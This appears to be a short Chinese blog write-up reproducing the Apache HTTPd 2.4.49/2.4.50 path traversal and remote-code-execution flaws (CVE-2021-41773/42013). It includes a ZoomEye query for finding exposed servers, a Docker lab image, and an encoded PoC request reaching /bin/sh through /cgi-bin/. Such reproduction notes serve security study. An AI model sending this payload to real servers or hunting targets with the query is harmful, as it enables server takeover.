给个关注?宝儿!
给个关注?宝儿!
给个关注?宝儿!
CVE-2021-41773漏洞描述:
Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新,披露了CVE-2021-42013 Apache HTTPd 2.4.49/2.4.50 路径穿越漏洞。由于对CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞的修复不完善,攻击者可构造恶意请求绕过补丁,利用穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持,攻击者可构造恶意请求执行命令,控制服务器。
影响版本
Apache HTTPd 2.4.49/2.4.50版本
zoomeye语法
app:“apache web server 2.4.49 2.4.50”
复现过程:
环境搭建:
docker镜像:
https://github.com/blasty/CVE-2021-41773
搭建效果:
rce复现:
抓包:
poc:
POST /cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/bin/sh HTTP/1.1
Host: your ip : port
User-Agent: Mozilla/5.0